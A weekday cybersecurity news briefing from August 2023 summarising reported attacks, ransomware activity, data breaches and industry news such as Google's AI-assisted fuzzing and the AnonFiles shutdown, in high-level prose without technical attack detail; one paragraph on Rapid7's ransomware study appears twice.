Cyber Briefing - 2023.08.18
?? What are the latest cybersecurity alerts, incidents, and news?
NoFilter, iOS 16, BlackCat, RemCom, Play Ransomware, SMS Bomber, Zimbra, Memecoin, Net Worker Alliance, Poland, 8BASE, ToyotaLift Northeast , NYC Data Breach, AI-Infused Fuzz Testing, Taiwan, Surge in Ransomware Profits, AnonFiles.
Welcome to Cyber Briefing , the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
First time seeing this? Please subscribe .
?? Cyber Alerts
A novel attack method dubbed NoFilter has been revealed, exploiting the Windows Filtering Platform (WFP) to achieve privilege escalation within the Windows operating system. The technique, demonstrated by cybersecurity firm Deep Instinct, involves manipulating the WFP to duplicate access tokens and elevate privileges from admin to "NT AUTHORITY\SYSTEM," enabling malicious actors to execute advanced attacks with higher authority and minimal traces. By utilizing built-in components like WFP, this innovative approach highlights the need for increased vigilance in monitoring and safeguarding Windows systems against evolving attack vectors.
Cybersecurity researchers at Jamf Threat Labs have unveiled an ingenious exploit targeting 苹果 's iOS 16, allowing attackers to maintain access to an Apple device despite the user activating Airplane Mode. This method creates an artificial Airplane Mode, displaying the icon and seemingly disconnecting the device from cellular data, while enabling the attacker's application to maintain a covert cellular network connection. The attack leverages modifications in both user interface (UI) and cellular data access, enabling a rogue payload to fly under the radar by mimicking the behavior of the legitimate Airplane Mode. The research sheds light on a sophisticated post-exploit technique that challenges conventional notions of device connectivity and security.
Microsoft has revealed the discovery of a fresh iteration of the BlackCat ransomware, also known as ALPHV and Noberus. This updated version incorporates tools like Impacket and RemCom to facilitate lateral movement and remote code execution. The inclusion of these tools allows the ransomware to spread more effectively in target environments, signifying an evolution in the tactics employed by cyber threat actors.
The Play ransomware group is employing sophisticated tactics by targeting managed service providers for initial network access and exploiting aging vulnerabilities in security systems. Kevin O’Connor, director of threat research at Adlumin , emphasizes the shrewdness of attacking through security vendors, noting that it often grants attackers unimpeded access under the guise of legitimate administrative actions. Furthermore, the group is using intermittent encryption techniques to evade detection while honing in on midsize financial, software, legal, and logistics sectors across the US, UK, Australia, and Italy. The Play group's arsenal now includes new exploits and a range of vulnerabilities, including Fortinet SSL VPN's CVE-2018-13379, highlighting the pressing need for thorough security patching and vigilance against emerging threats.
Cybersecurity researchers have uncovered a disturbing trend on underground forums: the sale of SMS Bomber attack tools, a modern menace in the evolving landscape of security threats. These attacks involve flooding victims' phone numbers with a barrage of text messages, causing disruptions such as vibrations, alert sounds, and notifications. SOCRadar researchers have found that hackers are not only distributing these tools through underground forums but are also exploiting messaging and open-source platforms like Telegram, ICQ, Discord, GitHub, and Replit. The pricing for these attack services ranges from flooding emails and phone calls to flooding SMS messages, with alarming rates as low as $0.03 per spam SMS. This discovery underscores the need for enhanced protection methods and countermeasures to safeguard against these types of attacks.
In an ongoing phishing campaign that started in April 2023, cybercriminals are targeting Zimbra Collaboration email servers worldwide, aiming to steal user credentials, according to a recent report by ESET . The campaign involves phishing emails impersonating organization administrators, notifying users of an upcoming email server update that requires them to click on an HTML attachment to avoid temporary account deactivation. The attached HTML file leads recipients to a fake Zimbra login page with prefilled credentials, successfully tricking victims into disclosing their passwords. Despite its apparent lack of sophistication, the campaign's widespread success highlights the need for increased awareness among Zimbra Collaboration users.
In a recent cybersecurity incident, a hacker targeted Base Network's decentralized exchange, RocketSwap, siphoning off 471 Ethereum coins, equivalent to approximately $860,000. The stolen funds were swiftly transferred to the Ethereum mainnet, where the hacker introduced a new memecoin called $LoveRCKT. This memecoin was further integrated into the Uniswap liquidity pool, pairing it with 400 Ethereum. Despite accusations of involvement from RocketSwap's team, the exchange emphasizes that the breach was orchestrated by an external malicious actor who exploited a vulnerability stemming from offline signatures.?
领英推荐
Poland faces another cyber attack, this time attributed to the "Net Worker Alliance" threat group. The group has asserted responsibility for targeting significant Polish websites, including the Warsaw Stock Exchange (GPW) , Warsaw Chopin Airport , PGZ Stocznia Wojenna , and Port of Gdynia Authority S.A. . The motives behind this cyber attack remain unclear, raising concerns about Poland's cybersecurity readiness.
Reports suggest that ToyotaLift Northeast may have fallen victim to a cyber attack, with claims of data compromise and ransom demands emerging from a hacker collective. Although the company has not confirmed the attack, the alleged hackers assert possession of ToyotaLift Northeast's data. ToyotaLift Northeast, a prominent provider of loading and forklifting services on the east coast, is facing uncertainties as the situation unfolds.
The NY city's Department of Finance mistakenly emailed a list of its employees' personal information, including home addresses, cell numbers, and email addresses, to all its staff as part of a failed test of its emergency notification system. The mishap also resulted in automated calls to employees during the early hours, causing concerns about the security of their data. The department is currently investigating the matter, and the breach has raised worries about the potential misuse of the exposed information by unauthorized parties.
?? Cyber News
Google has injected a dose of artificial intelligence magic into its open source fuzz testing infrastructure, yielding remarkable results that could redefine the landscape of bug-hunting. Through the integration of generative-AI technology into its OSS-FUZZ project, 谷歌 has unlocked substantial improvements in code coverage, a vital metric in vulnerability research. By leveraging large language models to automatically create new fuzz targets, Google managed to scale security enhancements across a wide array of projects, with the experiment showcasing code coverage increases of up to 31% without human intervention.
A crucial node in the global supply chains, faced an alarming surge of cyberattacks during the first half of 2023, with a staggering average of 15,000 attacks per second – an 80 percent increase from the previous year, according to a report by Fortinet, a prominent US-based cybersecurity firm. The report emphasized that Taiwan's pivotal role in supply chains makes it particularly susceptible to online threats, urging Taiwanese corporations to bolster their security measures. In a landscape where cybercriminals are refining their tactics, adapting strategies, and devising more lucrative models, Eric Wu, head of Fortinet Taiwan, underscored the escalating information security challenges faced by Taiwanese companies.
The landscape of cyber threats paints a grim picture as ransomware's profitability remains high and zero-day exploits gain traction. The study, based on observations from Rapid7 researchers and managed services teams, unveils over 1,500 ransomware victims worldwide in the first half of 2023. The report highlights the concerning combination of substantial criminal profits and organizations' inadequate security defenses, with nearly 40% of incidents attributed to weak multi-factor authentication? enforcement. Despite ongoing efforts, the overall cybersecurity landscape is expected to deteriorate due to financial incentives for cybercrime and persistent security weaknesses.
The landscape of cyber threats paints a grim picture as ransomware's profitability remains high and zero-day exploits gain traction. The study, based on observations from Rapid7 researchers and managed services teams, unveils over 1,500 ransomware victims worldwide in the first half of 2023. The report highlights the concerning combination of substantial criminal profits and organizations' inadequate security defenses, with nearly 40% of incidents attributed to weak multi-factor authentication (MFA) enforcement. Despite ongoing efforts, the overall cybersecurity landscape is expected to deteriorate due to financial incentives for cybercrime and persistent security weaknesses.
Popular online file hosting platform AnonFiles has abruptly shut down, attributing its decision to the overwhelming levels of abuse on its platform. The administrators expressed their frustration with the challenges posed by users misusing the service, leading them to cease its operations after years of running an anonymous file-sharing site. AnonFiles, known for hosting millions of uploads, attracted both legitimate users and cybercriminals alike, highlighting the delicate balance between convenience and security in the world of online file sharing.
Subscribe and Comment.
Copyright ? 2023 CyberMaterial . All Rights Reserved.
Follow CyberMaterial on: